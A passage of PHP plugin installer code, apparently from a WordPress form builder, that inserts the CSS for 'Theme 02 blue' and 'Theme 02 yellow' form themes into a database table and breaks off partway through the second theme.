    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(5, \'Theme 02 blue\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #ADC0DB;\r\nmargin-bottom: 10px;\r\ncolor: #ADC0DB;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/02/bg.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-slider {\r\n	background: #fff !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 4px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 29px;\r\n	background: url([SITE_ROOT]/images/02/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/02/01/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #285485;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 33px;\r\n	background: url([SITE_ROOT]/images/02/01/next.png) top right #708EB4;\r\n	padding: 0px 30px 0 15px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n .next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/01/next.png) top right #144077;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #285485;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/02/01/previous.png) top left #708EB4;\r\n	padding: 0px 15px 0 30px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n .previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/01/previous.png) top left #144077;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/02/bg.png) #708EB4;\r\n	cursor: pointer;\r\n	font-size: 16px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #285485;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 600;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #ADC0DB;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 1px solid #C5C5C5;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/02/bg.png) #708EB4;\r\n	text-align: left;\r\n	padding: 10px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: center;\r\nfont-size:18px;\r\nfont-family: Segoe UI;\r\ncolor:#0E3F76;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor:#0E3F76;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 4px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/02/01/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n} \r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 11px;\r\n	height: 10px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 1px;\r\n	left: 1px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: rgb(158, 0, 0);\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 4px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n	color: #2564A3;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n	font-weight: bold;\r\n}\r\n.page_deactive:nth-child(even) {\r\n	background-color: #DCDADB;\r\n}\r\n.page_deactive:nth-child(odd) {\r\n	background-color: #D1CDCE;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #0E3F77;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 18px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 17px;\r\n	line-height: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #0e3f77; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #0e3f77 0%, #0f437d 49%, #2f72b5 84%, #165ba9 99%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #0e3f77), color-stop(49%, #0f437d), color-stop(84%, #2f72b5), color-stop(99%, #165ba9)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #0e3f77 0%, #0f437d 49%, #2f72b5 84%, #165ba9 99%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #0e3f77 0%, #0f437d 49%, #2f72b5 84%, #165ba9 99%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #0e3f77 0%, #0f437d 49%, #2f72b5 84%, #165ba9 99%); /* IE10+ */\r\n	background: linear-gradient(to right, #0e3f77 0%, #0f437d 49%, #2f72b5 84%, #165ba9 99%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 17px;\r\n	line-height: 17px;\r\n	background-color: #CCCCCC;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -2px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\nfont-size: 13px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 17px;\r\n	height: 17px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(6, \'Theme 02 yellow\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #EADEB4;\r\nborder: 1px solid #E3E2E4;\r\nmargin-bottom: 10px;\r\ncolor: #E3E2E4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/02/bg.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #ECBD00 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-slider {\r\n	background: #fff !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 4px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 29px;\r\n	background: url([SITE_ROOT]/images/02/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/02/02/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 33px;\r\n	background: url([SITE_ROOT]/images/02/next.png) top right #CFAB1A;\r\n	padding: 0px 30px 0 15px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/next.png) top right  #A08104;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 